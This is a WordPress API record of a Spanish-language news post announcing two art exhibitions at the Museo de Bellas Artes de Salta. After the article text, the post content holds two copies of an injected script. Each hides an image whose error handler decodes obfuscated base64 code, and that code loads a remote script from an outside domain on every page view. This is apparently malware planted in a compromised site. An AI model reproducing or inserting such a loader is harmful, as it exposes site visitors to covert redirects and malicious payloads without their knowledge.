{"id":4504,"date":"2024-10-17T08:31:46","date_gmt":"2024-10-17T11:31:46","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4504"},"modified":"2025-08-13T23:47:11","modified_gmt":"2025-08-14T02:47:11","slug":"inauguran-dos-nuevas-muestras-en-el-museo-de-bellas-artes","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4504","title":{"rendered":"Inauguran dos nuevas muestras en el Museo de Bellas Artes"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-cyan-bluish-gray-color has-black-background-color has-text-color has-background has-link-color wp-elements-ebe1e81e9838d349017292610a73cd05\"><em>Ma\u00f1ana viernes 18 de octubre, a las 19.30 hs, quedar\u00e1n inauguradas \u201cPolvareda\u201d del grupo Ronda y \u201cD\u00edas de luna\u201d de Agustina Alazraki.<\/em><\/h4>\n\n\n\n<p>A partir del s\u00e1bado 19 de octubre, se podr\u00e1 visitar, en el Museo de Bellas Artes de Salta (Av. Belgrano 992), las muestras \u201cPolvareda\u201d del colectivo de artistas Ronda curada por Diana Aisenberg, y \u201cD\u00edas de luna\u201d de la artista porte\u00f1a Agustina Alazraki, curada por Javier Villa.<\/p>\n\n\n\n<p>\u201cPolvareda\u201d se trata de una muestra de diversas expresiones de las artes visuales contempor\u00e1neas realizadas por el colectivo art\u00edstico Ronda, conformado por Andrea Lilian, Roc\u00edo Barzola, Tatiana Castillo, Milagros D\u2019Aiello, Victoria Michel, Silvina Pirola, Paula Puca y M\u00f3nica Mill\u00e1n. Maderas, textiles, fotograf\u00edas, cer\u00e1micas, colores y texturas crean obras de autor, que no dejan de estar comprometidas con la producci\u00f3n y la reflexi\u00f3n colectiva del grupo. Esta muestra es el corolario de un a\u00f1o de trabajo junto a la artista visual, pintora y docente Diana Aisenberg, a cargo de la curadur\u00eda de la misma.<\/p>\n\n\n\n<p>La exhibici\u00f3n de pintura \u201cD\u00edas de luna\u201d, de la artista contempor\u00e1nea Agustina Alazraki, combina el informalismo, la abstracci\u00f3n geom\u00e9trica y la pintura argentina contempor\u00e1nea con una impronta personal. Sus \u00f3leos discurren por investigaciones de la imagen realizadas por la artista desde el 2021 a esta parte. Su b\u00fasqueda explora el color, la geometr\u00eda y la escritura de procesos \u201con\u00edricos\u201d o \u201cpintura recesiva\u201d. La muestra est\u00e1 curada por Javier Villa, Curador de Artes Visuales en el Centro Cultural Recoleta y Co-director del Museo del Riachuelo (CABA).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/inauguran-dos-nuevas-muestras-en-el-museo-de-bellas-artes-98224\">Secretaria de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana viernes 18 de octubre, a las 19.30 hs, quedar\u00e1n inauguradas \u201cPolvareda\u201d del grupo Ronda y \u201cD\u00edas de luna\u201d de Agustina Alazraki. A partir del s\u00e1bado 19 de octubre, se podr\u00e1 visitar, en el Museo de Bellas Artes de Salta (Av. Belgrano 992), las muestras \u201cPolvareda\u201d del colectivo de artistas Ronda curada por Diana Aisenberg, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4505,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-4504","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4504"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4504"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4504\/revisions"}],"predecessor-version":[{"id":6661,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4504\/revisions\/6661"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4505"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}